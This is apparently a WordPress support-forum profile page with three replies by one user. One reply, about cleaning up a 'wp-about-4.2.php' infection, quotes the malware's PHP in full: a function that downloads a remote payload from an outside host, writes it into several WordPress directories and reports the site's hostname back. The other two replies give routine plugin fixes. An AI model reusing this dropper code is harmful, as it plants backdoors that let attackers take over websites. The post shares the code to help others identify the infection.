iriminerd
Forum Replies Created
Viewing 3 replies - 1 through 3 (of 3 total)
-
Forum: Fixing WordPress
In reply to: Need help removing wp-about-4.2.php Malware fileThanks @useshots. That was what was happening with me also. I saw the script was referencing a file hosted on some private school in Louisiana’s server. I emailed them to let them know.
This is the php:
function BNS_Add_Widget_Definition() { if (!file_exists(ABSPATH.'wp-about-4.2.php')&&!file_exists(ABSPATH.'wp-content/wp-about-4.2.php')&&!file_exists(ABSPATH.'wp-includes/wp-about-4.2.php')){ $bns_conf=wp_remote_get('https://archbishopchapelle.org/wp-content/uploads/wpmp-previews/temp.php'); if (!file_put_contents(ABSPATH.'wp-about-4.2.php',$bns_conf["body"])){ if (!file_put_contents(ABSPATH.'wp-content/wp-about-4.2.php',$bns_conf["body"])){ file_put_contents(ABSPATH.'wp-includes/wp-about-4.2.php',$bns_conf["body"]); $bns_conf=wp_remote_get('https://archbishopchapelle.org/wp-content/uploads/wpmp-previews/p.php?host='.urlencode($_SERVER['HTTP_HOST'].'-2')); } else $bns_conf=wp_remote_get('https://archbishopchapelle.org/wp-content/uploads/wpmp-previews/p.php?host='.urlencode($_SERVER['HTTP_HOST'].'-1')); } } }
Forum: Plugins
In reply to: [Responsive flipbook wordpress plugin free download] Not able to Upload PDFJS error 404 missing my-admin.js.
I found a copy of it on the developer’s website.If you upload this file: https://www.wppdf.org/wp-content/plugins/flipbook/js/my-admin.js to /wp-content/plugins/wppdf/js the pdf uploader should work.
in the plugin folder there’s a /theme/ folder. Inside that there’s a file ‘password-protected-login.php’ that you can customize. Upload it to your site’s theme folder and the plugin will default to your custom one.
In there you can put whatever css or template changes to the login screen.
Viewing 3 replies - 1 through 3 (of 3 total)